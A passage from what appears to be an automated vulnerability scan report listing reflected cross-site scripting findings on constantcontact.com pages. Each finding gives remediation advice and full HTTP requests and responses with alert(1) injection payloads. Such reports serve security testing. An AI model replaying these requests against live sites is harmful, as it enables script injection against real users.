Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:40 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/event-marketing9d0c6';alert(1)//06b6ed919e7/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.170. http://www.constantcontact.com/event-marketing/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /event-marketing/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1406b'%3balert(1)//0352d3379ca was submitted in the REST URL parameter 2. This input was echoed as 1406b';alert(1)//0352d3379ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /event-marketing/1406b'%3balert(1)//0352d3379ca HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:50 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=9BD6BC5045B2A5B8C9AEEFDE50F4D48C.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:50 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:50 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:50 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:50 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/event-marketing/1406b';alert(1)//0352d3379ca/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.171. http://www.constantcontact.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7f91'%3balert(1)//0a6cd2be97d was submitted in the REST URL parameter 1. This input was echoed as b7f91';alert(1)//0a6cd2be97d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b7f91'%3balert(1)//0a6cd2be97d?ssl=false HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; BIGipServerProdLP=2202407946.20480.0000

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:18 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=D2DA0E21DEF3351F08241EB95F3ABA98.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_partner="prt_01_ts=21510989|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:18 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:18 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_23:29:18.913_D2DA0E21DEF3351F08241EB95F3ABA98.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:18 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:18 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/b7f91';alert(1)//0a6cd2be97d/index.jsp';
s.server='531';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_23:29:18.913_D2DA0E21DEF3351F08241EB95F3A
...[SNIP]...

2.172. http://www.constantcontact.com/features/signup.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /features/signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6054c'%3balert(1)//43bbe87b01a was submitted in the REST URL parameter 1. This input was echoed as 6054c';alert(1)//43bbe87b01a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /features6054c'%3balert(1)//43bbe87b01a/signup.jsp HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://blogs.constantcontact.com/commentary/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; ctctblog=1%3A%3A21510937; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656299|session#1290656215273-380517#1290658099; s_cc=true; s_sq=%5B%5BB%5D%5D; offer_temp=""

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:30:06 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=DB8142F18C9F6E9DC55395004A7A0131.worker_landingPages; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:06 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:06 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_04_ts=21510990|prt_04=partner.name::ROVING|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:06 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary/|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:06 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/features6054c';alert(1)//43bbe87b01a/signup.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://blogs.constantcontact.com/commentary/';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101
...[SNIP]...

2.173. http://www.constantcontact.com/features/signup.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /features/signup.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe60'%3balert(1)//4c73750cddf was submitted in the REST URL parameter 2. This input was echoed as 4fe60';alert(1)//4c73750cddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /features/4fe60'%3balert(1)//4c73750cddf HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://blogs.constantcontact.com/commentary/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; ctctblog=1%3A%3A21510937; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656299|session#1290656215273-380517#1290658099; s_cc=true; s_sq=%5B%5BB%5D%5D; offer_temp=""

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:30:13 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=DE8279EBA1998744FD9E1B8A05D37888.worker_landingPages; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:13 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:13 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_04_ts=21510990|prt_04=partner.name::ROVING|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:13 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary/|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:13 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/email-marketing/4fe60';alert(1)//4c73750cddf/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://blogs.constantcontact.com/commentary/';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='201011
...[SNIP]...

2.174. http://www.constantcontact.com/footer_quote.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /footer_quote.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1407e'%3balert(1)//03394fdfa99dd70d2 was submitted in the REST URL parameter 1. This input was echoed as 1407e';alert(1)//03394fdfa99dd70d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1407e'%3balert(1)//03394fdfa99dd70d2?c=1290653339811 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Origin: http://www.constantcontact.com
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:43 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=A98E3BCA18F50EF05C173A7FE2DD4E0D.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:43 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:43 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:43 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:43 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/1407e';alert(1)//03394fdfa99dd70d2/index.jsp';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';
s.prop1=''
...[SNIP]...

2.175. http://www.constantcontact.com/footer_quote.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /footer_quote.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18a7'%3balert(1)//b6f7bace160 was submitted in the REST URL parameter 1. This input was echoed as e18a7';alert(1)//b6f7bace160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e18a7'%3balert(1)//b6f7bace160 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:05 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=CF7ABA1C7B7AC41CAE24B1CAFA2A8C5E.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:05 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:05 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:05 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:05 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/e18a7';alert(1)//b6f7bace160/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.176. http://www.constantcontact.com/global-login.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /global-login.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab77c'%3balert(1)//29b98d35938 was submitted in the REST URL parameter 1. This input was echoed as ab77c';alert(1)//29b98d35938 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab77c'%3balert(1)//29b98d35938 HTTP/1.1
